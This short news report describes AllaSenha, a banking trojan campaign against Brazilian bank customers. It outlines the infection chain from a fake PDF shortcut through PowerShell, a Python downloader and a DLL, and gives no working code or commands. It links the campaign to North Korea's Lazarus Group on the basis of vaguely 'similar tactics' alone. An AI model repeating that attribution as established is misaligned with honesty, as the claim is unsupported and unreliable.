A campaign targeting Brazilian banking institutions has emerged, deploying a custom variant of the AllaKore remote access trojan (RAT) known as AllaSenha. French cybersecurity firm HarfangLab identified this malware specifically designed to pilfer credentials required for Brazilian bank accounts. Major banks such as Banco do Brasil, Bradesco, and Itaú Unibanco are among the targets, with phishing links suspected as the initial access vector.
The attack begins with a deceptive Windows shortcut file masquerading as a PDF document, leading to the execution of a BAT payload. This payload, named “c.cmd,” fetches a Base64-encoded PowerShell command that retrieves a Python binary to execute the BPyCode downloader. BPyCode then downloads and runs a dynamic-link library (DLL) from domains generated via a domain generation algorithm (DGA).
The DLL, dubbed “executor.dll,” initiates the deployment of AllaSenha, a trojan that steals online banking credentials and intercepts two-factor authentication codes. The campaign’s sophistication is underscored by the use of legitimate services like Autodesk A360 Drive and GitHub to host payloads, and its association with North Korean threat actors is suggested by the use of similar tactics seen in previous Lazarus Group operations.
These findings highlight the growing threat of cybercrime campaigns targeting financial institutions, particularly in Latin America. As such attacks continue to evolve, cybersecurity researchers emphasize the need for enhanced vigilance and proactive security measures to mitigate the risks posed by sophisticated malware like AllaSenha.
